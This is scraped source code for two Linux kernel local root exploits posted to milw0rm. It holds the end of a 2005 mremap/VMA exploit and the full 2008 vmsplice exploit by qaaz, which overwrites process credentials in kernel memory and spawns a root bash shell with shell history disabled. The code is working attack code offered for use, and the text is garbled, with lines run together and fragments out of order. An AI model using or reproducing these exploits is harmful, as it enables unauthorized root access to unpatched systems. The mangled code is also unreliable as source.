failed: printf("failed:\n"). } write protect brk's VMA to fool vm_enough_memory() r = sys_mprotect((lib_addr + PAGE_SIZE). vma_start. signal(SIGSEGV. PROT_READ|map_flags). vma_end = vma_start + sz + 2*PAGE_SIZE. fflush(stdout).8x-0x%. } // // // // this will finally make the big VMA. expand: r = sys_madvise((void*)(lib_addr + PAGE_SIZE). vma_end). } else { sz -= PAGE_SIZE. if(-1==r) { if(0==sz) { fatal("mremap: expand VMA". PAGE_SIZE.. fflush(stdout). NULL). reaper). fatal("try again". fflush(stdout). MREMAP_MAYMOVE. %c". PAGE_SIZE). if(r) fatal("munmap 1". // try to figure kernel layout signal(SIGCHLD. r = sys_munmap(lib_addr. } pcnt++. goto expand.if( !silent && !(pcnt%64) ) { printf("\r Wait.. sys_gettimeofday(&tm2. LIB_SIZE-PAGE_SIZE. 0). check_vma_flags().) { sys_sched_yield(). signal(SIGBUS. scan_mm_start(). 0). 0). sz.. relax kswapd sys_gettimeofday(&tm1. smiley[ (pcnt/64)%8 ]). write(fd. &eh. // // // } // move stack down #2 void prepare_finish() { int r. write(fd. eh. eh. 0). if(fd<0) fatal("open lib ("LIBNAME" not writable?)". 0755). eh. eh. &tmpbuf. 0).p_flags = PF_W|PF_R|PF_X. task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB.p_memsz = LIB_SIZE. eph. 0.e_phentsize = sizeof(struct elf_phdr). task_size-old_esp). eph.} // make fake ELF library void make_lib() { struct elfhdr eh. lib_addr = task_size . sizeof(eph) ). eh. memset(tmpbuf. &eph. write(fd. 4096. printf("\n[+] moved stack %x.PGD_SIZE) & ~(PGD_SIZE-1). sizeof(eh) ). sizeof(eh) ). r = sys_munmap(old_esp. static char tmpbuf[PAGE_SIZE]. old_esp &= ~(PAGE_SIZE-1). elf exec header memcpy(eh. eph. memset(&eh. // make our elf library umask(022).p_vaddr = lib_addr. eph.e_ident. 0x90. sizeof(eph) ). ELFMAG. old_esp -= PAGE_SIZE. .p_offset = 4096. int fd. struct elf_phdr eph.p_type = PT_LOAD. // setup rt env uid = getuid(). if(r) fatal("unmap stack".e_type = ET_EXEC.PAGE_SIZE.e_phnum = 1. eph. SELFMAG).e_machine = EM_386. map_base=0x%.8x". sizeof(tmpbuf) ). static struct sysinfo si. sizeof(tmpbuf) ). 
O_RDWR|O_CREAT|O_TRUNC.p_filesz = 4096. fd=open(libname. else map_base = map_addr = (lib_addr . unlink(libname). SEEK_SET). 0. eph.LIB_SIZE . section header: memset(&eph.8x. task_size=0x%. execable code lseek(fd. close(fd).e_phoff = sizeof(eh). if(map_base) map_addr = map_base. 0.totalram. if((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max < (unsigned)addr_min) addr_max = 0xffffd000. map_base). 0 ). __asm__("movl%%esp. addr_min = (addr_min + PGD_SIZE . max_page + 32). pagemap = malloc( max_page + 32 ). addr_max). for(. // } // move stack down #1 void prepare() { unsigned p=0. old_esp = map_base? map_base : old_esp. addr_max = addr_min + si. MAP_PRIVATE|MAP_ANONYMOUS.) { if(left<=0) left = get_slab_objs("vm_area_struct"). prepare_finish(). addr_min. // check physical mem & prepare sysinfo(&si).addr_min) / PAGE_SIZE. } void chldcnt(int v) { ccnt++. left=0.. %0" : : "m"(old_esp) ). if(!pagemap) fatal("malloc pagemap".0x%. %%esp \n" : : "m"(old_esp). old_esp = (old_esp . fflush(stdout). 1).totalram.. if(left <= SLAB_THRSH) break. memset(pagemap. if(-1==p) fatal("mmap2 stack". c=0.64. printf("\n[+] vmalloc area 0x%. "m"(p) ). environ = myenv. addr_min = task_size + si. STACK_SIZE. 0). PROT_READ|PROT_WRITE.old_esp. %0 \n" "movl %1. } // alloc slab objects. max_page = (addr_max .8x".. go go make_lib().8x . p = sys_mmap2( 0. inline void do_wipe() { int *r. exploitme().PGD_SIZE+1) & ~(PGD_SIZE-1).1) & ~(PGD_SIZE-1). . __asm__("movl%%esp. p += STACK_SIZE . task_size. 0. SIG_DFL). for(. val++. -b to clean SLAB int main(int ac. if( get_slab_objs("vm_area_struct") <= SLAB_THRSH ) break. _exit(1). for(. } c++. fflush(stdout). if(MAP_FAILED == r) break. printf("\t\t-c command to run\n"). 0. SIGUSR1). fflush(stdout).) pause(). chldcnt). printf("\t\t-d race delta us\n"). map_flags. printf("\n"). PAGE_SIZE.left--.) { ccnt=0. if(c>SLAB_PER_CHLD) break. cpid = fork(). val. while(!ccnt) sys_sched_yield(). fflush(stdout). kill(getppid(). MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED. 
if(!cpid) do_wipe(). } printf("\r child %d VMAs %d". printf("\t\t-a alternate addr hex\n"). printf("\t\t-n SMP iterations\n"). n). c). old_esp -= PAGE_SIZE. } // empty SLAB caches void wipe_slab() { signal(SIGUSR1. 0 ). r = (void*)sys_mmap2(old_esp. printf("\t\t-w wait time seconds\n"). c). val. map_flags ^= PROT_READ.. char **av) { int r. } signal(SIGUSR1. printf("\t\t-l alternate lib name\n"). } void usage(char *n) { printf("\nUsage: %s\t-f forced stop\n". printf("\n[+] SLAB cleanup"). if( (c%1024)==0 ) { if(!c) printf("\n"). printf("\r child %d VMAs %d". } // give -s for forced stop.. printf("\t\t-s silent mode\n"). . case 'w' : wtime = atoi(optarg). case 'l' : libname = strdup(optarg). "%u". break. break. } } consume_pid = fork(). &delta_max) || delta_max > 100000u ) fatal("bad delta value". setpgrp(). break. if(wtime<0) fatal("bad wait value". break. 0). wipe_slab(). prepare(). av. } basic setup uid = getuid(). 0). case 's' : silent = 1. break. pause(). break. if (consume_pid == 0) { consume_memory().while(ac) { r = getopt(ac. &map_base)) fatal("bad addr value". case 'a' : if(1!=sscanf(optarg. // return 0. case 'c' : shellname = strdup(optarg). return 0. case 'n' : smp_max = atoi(optarg). 0). case 'd': if(1!=sscanf(optarg. break. "%x". if(r<0) break. "n:l:a:w:c:d:fsh"). break. case 'h' : default: usage(av[0]). break. map_base &= ~(PGD_SIZE-1). switch(r) { case 'f' : fstop = 1. } . 24. } .6.h> #include <errno.17 . * It should work well. int mapcount.6.c * * Dovalim z knajpy a cumim ze Wojta zas nema co robit.h> #include <asm/page. tutaj mate cosyk na hrani.h> #include <malloc. void char void { exit_code().h> #include <signal. int err) printf(err ? "[-] %s: %s\n" : "[-] %s\n". Source code for the Kernel 2.1 * * This is quite old code and I had to rewrite it to even compile. * Stejnak je to stare jak cyp a aj jakesyk rozbite. fflush(stdout).h> #include <stdlib. }.com [2005-01-27] B. exit(1). die(char *msg. int count. struct { long next. kura. 
so I'm not 100% sure about it. You've been warned .2. * Gizdi. kym aj totok vykeca. msg.6 vmsplice exploit /* * jessica_biel_naked_in_my_bed.h> #include <unistd.h> #define #define #define #define #define PIPE_BUFFERS 16 PG_compound14 uint unsigned int static_inline static inline __attribute__((always_inline)) STACK(x) (x + sizeof(x) . unsigned long index. * * Linux vmsplice Local Root Exploit * By qaaz * * Linux 2. void *mapping.h> #include <string. but I don't remeber original intent of all * the code. unsigned long private. strerror(err)).// milw0rm. } lru.h> #include <sys/mman.h> #include <sys/uio. prev.h> #include <limits.40) struct page { unsigned long flags. exit_stack[1024 * 1024]. fflush(stderr).h> #define __KERNEL__ #include <asm/unistd.) * * -static -Wno-format */ #define _GNU_SOURCE #include <stdio. #if defined (__i386__) #ifndef __NR_vmsplice #define __NR_vmsplice #endif #define USER_CS #define USER_SS #define USER_FL 316 0x73 0x7b 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "movl %0. } . "i" (USER_FL)." "movq %1. "r" (exit_code) ). 0x08(%%rsp) . } static_inline void *get_current() { unsigned long curr." "movq %3. 0x10(%%rsp) . __asm__ __volatile__ ( "movl %%esp. "r" (STACK(exit_stack)). 0x00(%%rsp) . %0" : "=r" (curr) : "i" (~8191) ). "r" (exit_code) ). %%eax . 0x18(%%rsp) . "i" (USER_CS). "i" (USER_FL). "r" (STACK(exit_stack))." "movl %3." "movq %2." "andl %1. 0x04(%%esp) ." "movl (%%eax)." "iretq" : : "i" (USER_SS)." "movl %4. 0x0c(%%esp) ." "iret" : : "i" (USER_SS)." "movl %1. 0x08(%%esp) . 0x20(%%rsp) . 0x00(%%esp) . } #elif defined (__x86_64__) #ifndef __NR_vmsplice #define __NR_vmsplice #endif #define USER_CS #define USER_SS #define USER_FL 278 0x23 0x2b 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "swapgs . 0x10(%%esp) . return (void *) curr." "movl %2." "movq %4." "movq %0. "i" (USER_CS). %%eax . putenv("HISTFILE=/dev/null"). (fd). (io). } void { exit_code() if (getuid() != 0) die("wtf". } exit_kernel(). 
struct iovec *. __asm__ __volatile__ ( "movq %%gs:(0). NULL). nr_segs. i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0.nr. syscall(__NR_vmsplice. i < 1024-13. gid. } #else #error "unsupported arch" #endif #if defined (_syscall4) #define __NR__vmsplice __NR_vmsplice _syscall4( long.fl) #endif static uint uid. p = (uint *) ((char *)(p + 8) + sizeof(void *)). *p = get_current(). "bash". unsigned long. %0" : "=r" (curr) ). fd. int. } int main(int argc. unsigned int. "-i". void { kernel_code() int uint i. break.io. errno). flags) #else #define _vmsplice(fd. iov. 0). char *argv[]) . printf("[+] root\n").static_inline void *get_current() { unsigned long curr. _vmsplice. return (void *) curr. (fl)) for (i = 0. p[0] = p[1] = p[2] = ~0. (nr). die("/bin/bash". } p++. p[4] = p[5] = p[6] = p[7] = 0. execl("/bin/bash". pages[0]). (long) kernel_code. 0). /*****/ pages[0] = *(void **) &(int[2]){0. /*****/ pages[2] = *(void **) pages[0]. -1. struct page *pages[5]. map_size..0}. printf("[+] mmap: 0x%lx .next = = = = 1 << PG_compound. errno). /*****/ pages[4] = *(void **) &(int[2]){PAGE_SIZE. PROT_READ | PROT_WRITE. errno). pages[2]). size_t map_size. map_addr = mmap(pages[0]. pages[3] = pages[2] + 1. printf("[+] page: 0x%lx\n". char * map_addr. 0).next = = = = 1 << PG_compound. PROT_READ | PROT_WRITE. map_addr + map_size). (long) kernel_code. (unsigned long) pages[0]. printf("[+] page: 0x%lx\n". printf("-----------------------------------\n"). map_size = PAGE_SIZE. pages[0]->flags pages[0]->private pages[0]->count pages[1]->lru. uid = getuid().. pages[1]). 0x%lx\n". memset(map_addr. map_addr = mmap(pages[2]. printf("[+] page: 0x%lx\n". memset(map_addr. if (map_addr == MAP_FAILED) die("mmap". gid). setresuid(uid. uid). gid = getgid(). 0). map_addr + map_size). map_size = PAGE_SIZE. if (!uid || !gid) die("!@#$". 0. map_size = PAGE_SIZE. map_size. map_size). 
pages[2]->flags pages[2]->private pages[2]->count pages[3]->lru. printf("[+] page: 0x%lx\n". PROT_READ | PROT_WRITE. printf("[+] mmap: 0x%lx .PAGE_SIZE}. 0). printf("-----------------------------------\n"). pages[3]). 0. map_addr. 1. gid. map_addr = mmap(pages[4]. 0x%lx\n". map_addr. printf(" Linux vmsplice Local Root Exploit\n"). MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS. 1. pages[1] = pages[0] + 1.{ int pi[2]. struct iovec iov. . map_size. setresgid(gid. -1. MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS. -1. (unsigned long) pages[2]. printf(" By qaaz\n"). uid. map_size). MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS. if (map_addr == MAP_FAILED) die("mmap". printf("[+] mmap: 0x%lx . if (map_addr == MAP_FAILED) die("mmap". map_size.if (map_addr == MAP_FAILED) die("mmap". &iov. map_addr. errno). memset(map_addr. map_size). PAGE_SIZE) < 0) die("munmap". 1. pages[4]). map_size). printf("[+] mmap: 0x%lx . /*****/ map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE. printf("[+] page: 0x%lx\n". errno). errno). iov.. iov. map_addr. signal(SIGPIPE.iov_len = ULONG_MAX. if (munmap(map_addr + map_size. map_addr = mmap(NULL.. 0). 0). errno). -1.com [2008-02-09] . close(pi[0]). die("vmsplice". /*****/ if (pipe(pi) < 0) die("pipe". errno). memset(map_addr. return 0. PROT_READ | PROT_WRITE.iov_base = map_addr. 0x%lx\n". 0. 0x%lx\n". } // milw0rm. map_addr + map_size). /*****/ map_size -= 2 * PAGE_SIZE. 0. MAP_PRIVATE | MAP_ANONYMOUS. map_addr + map_size). exit_code). _vmsplice(pi[1].